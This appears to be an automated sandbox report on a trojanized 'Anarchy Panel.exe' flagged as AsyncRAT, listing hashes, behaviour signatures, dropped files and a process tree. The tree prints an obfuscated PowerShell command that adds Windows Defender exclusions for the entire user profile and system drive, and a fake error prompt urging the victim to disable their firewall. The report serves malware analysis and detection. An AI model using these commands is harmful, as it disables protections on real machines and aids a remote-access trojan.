Overview

overview

10

Static

static

10

Anarchy Panel.exe

windows7-x64

10

Anarchy Panel.exe

windows10-2004-x64

10

Plugins/0g...oG.dll

windows7-x64

1

Plugins/0g...oG.dll

windows10-2004-x64

1

Plugins/59...uJ.dll

windows7-x64

1

Plugins/59...uJ.dll

windows10-2004-x64

1

Plugins/Cj...qM.dll

windows7-x64

1

Plugins/Cj...qM.dll

windows10-2004-x64

1

Plugins/EV...LC.dll

windows7-x64

1

Plugins/EV...LC.dll

windows10-2004-x64

1

Plugins/FBSyChwp.dll

windows7-x64

1

Plugins/FBSyChwp.dll

windows10-2004-x64

1

Plugins/G3...uZ.dll

windows7-x64

1

Plugins/G3...uZ.dll

windows10-2004-x64

1

Plugins/KNTmoSnG.dll

windows7-x64

1

Plugins/KNTmoSnG.dll

windows10-2004-x64

1

Plugins/PK...TS.dll

windows7-x64

1

Plugins/PK...TS.dll

windows10-2004-x64

1

Plugins/Rs...xj.dll

windows7-x64

1

Plugins/Rs...xj.dll

windows10-2004-x64

1

Plugins/Wk...pi.dll

windows7-x64

1

Plugins/Wk...pi.dll

windows10-2004-x64

1

Plugins/eM...s4.dll

windows7-x64

1

Plugins/eM...s4.dll

windows10-2004-x64

1

Plugins/fzAgyDYa.dll

windows7-x64

1

Plugins/fzAgyDYa.dll

windows10-2004-x64

1

Plugins/mGWHaG2Jn.dll

windows7-x64

1

Plugins/mGWHaG2Jn.dll

windows10-2004-x64

1

Plugins/mM...GA.dll

windows7-x64

1

Plugins/mM...GA.dll

windows10-2004-x64

1

Plugins/oYsKwDG.dll

windows7-x64

1

Plugins/oYsKwDG.dll

windows10-2004-x64

1

Analysis

  • max time kernel
    119s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    25-07-2024 14:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Anarchy Panel.exe

  • Size

    60.8MB

  • MD5

    c0eb5b0616dad08c48a21f840bf9e2bc

  • SHA1

    f41c0747386053e1eb32d710d360a08c35de10c2

  • SHA256

    d13fc809b467a28598451093bff3f9649a96082e041e775f174c55d5eadd7cc5

  • SHA512

    bfdf7ed57ab450f19748b207ab542136a9c836c4ad174fbf507df3aae7a69acb710a0d66a85d5ec6a6c6b23363fd6ef559a0096d12fbfa322cb4970f4db572b4

  • SSDEEP

    1572864:nWEhJfOrr878YLP5X3xCZubIX6+3gl7Mqui:xJfE+rP5HS2h9o

Score
10/10
asyncratdefense_evasiondiscoveryratupx

Malware Config

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Time Discovery 1 TTPs 2 IoCs

    Adversary may gather the system time and/or time zone settings from a local or remote system.

    discovery
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Modifies system certificate store 2 TTPs 4 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe
    "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2088
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAbgB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAagBxACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGwAZABxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAagByACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1452
    • C:\Windows\windowssdk.exe
      "C:\Windows\windowssdk.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1636
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -u -p 1636 -s 64
        3⤵
          PID:2180
      • C:\Users\Admin\AppData\Local\Temp\AnarchyBuilder.exe
        "C:\Users\Admin\AppData\Local\Temp\AnarchyBuilder.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Modifies system certificate store
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2692
        • C:\Windows\system32\cmd.exe
          "cmd.exe" /c start cmd /C "color b && title Error && echo SSL assertion fail, make sure you're not debugging Network. Disable internet firewall on router if possible. & echo: & echo If not, ask the developer of the program to use custom domains to fix this. && timeout /t 5"
          3⤵
          • System Time Discovery
          • Suspicious use of WriteProcessMemory
          PID:2928
          • C:\Windows\system32\cmd.exe
            cmd /C "color b && title Error && echo SSL assertion fail, make sure you're not debugging Network. Disable internet firewall on router if possible. & echo: & echo If not, ask the developer of the program to use custom domains to fix this. && timeout /t 5"
            4⤵
            • System Time Discovery
            • Suspicious use of WriteProcessMemory
            PID:1692
            • C:\Windows\system32\timeout.exe
              timeout /t 5
              5⤵
              • Delays execution with timeout.exe
              PID:772

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Cab3545.tmp
      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Tar35B5.tmp
      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

      Download Submit

    • C:\Windows\windowssdk.exe
      Filesize

      6.2MB

      MD5

      e58b6dba9e96f3f015010a7796676153

      SHA1

      bae94a6035fe295f803c12b7dbc85cac2bf120a0

      SHA256

      9e8a91ecf50a0e4d9cda2f80380345d8edba197551a2bc5c797cb43007fd8181

      SHA512

      1b357abde0a7fa9dca1e4cb1d15f250800bedf80faa25b8b211f51527484af392ae9d6b47fa6c512eea42124f523654ba92ac6e40aa15fc71d5c98cbfbbdbe59

      Download Submit

    • \Users\Admin\AppData\Local\Temp\Costura\C5730A4C0FDD612A5678E51A536CE09E\64\sqlite.interop.dll
      Filesize

      1.7MB

      MD5

      56a504a34d2cfbfc7eaa2b68e34af8ad

      SHA1

      426b48b0f3b691e3bb29f465aed9b936f29fc8cc

      SHA256

      9309fb2a3f326d0f2cc3f2ab837cfd02e4f8cb6b923b3b2be265591fd38f4961

      SHA512

      170c3645083d869e2368ee16325d7edaeba2d8f1d3d4a6a1054cfdd8616e03073772eeae30c8f79a93173825f83891e7b0e4fd89ef416808359f715a641747d7

      Download Submit

    • memory/1636-5-0x000000013FE70000-0x00000001405F7000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1636-110-0x000000013FE70000-0x00000001405F7000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1636-24-0x000000013FE70000-0x00000001405F7000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/2088-4-0x0000000006D00000-0x0000000007487000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/2692-23-0x000000001FA40000-0x000000001FE00000-memory.dmp

      Filesize

      3.8MB

      Download

    • memory/2692-26-0x000000001E620000-0x000000001E634000-memory.dmp

      Filesize

      80KB

      Download

    • memory/2692-25-0x0000000020760000-0x00000000208AE000-memory.dmp

      Filesize

      1.3MB

      Download

    • memory/2692-22-0x000000001F450000-0x000000001FA38000-memory.dmp

      Filesize

      5.9MB

      Download

    • memory/2692-17-0x00000000008D0000-0x0000000003F6E000-memory.dmp

      Filesize

      54.6MB

      Download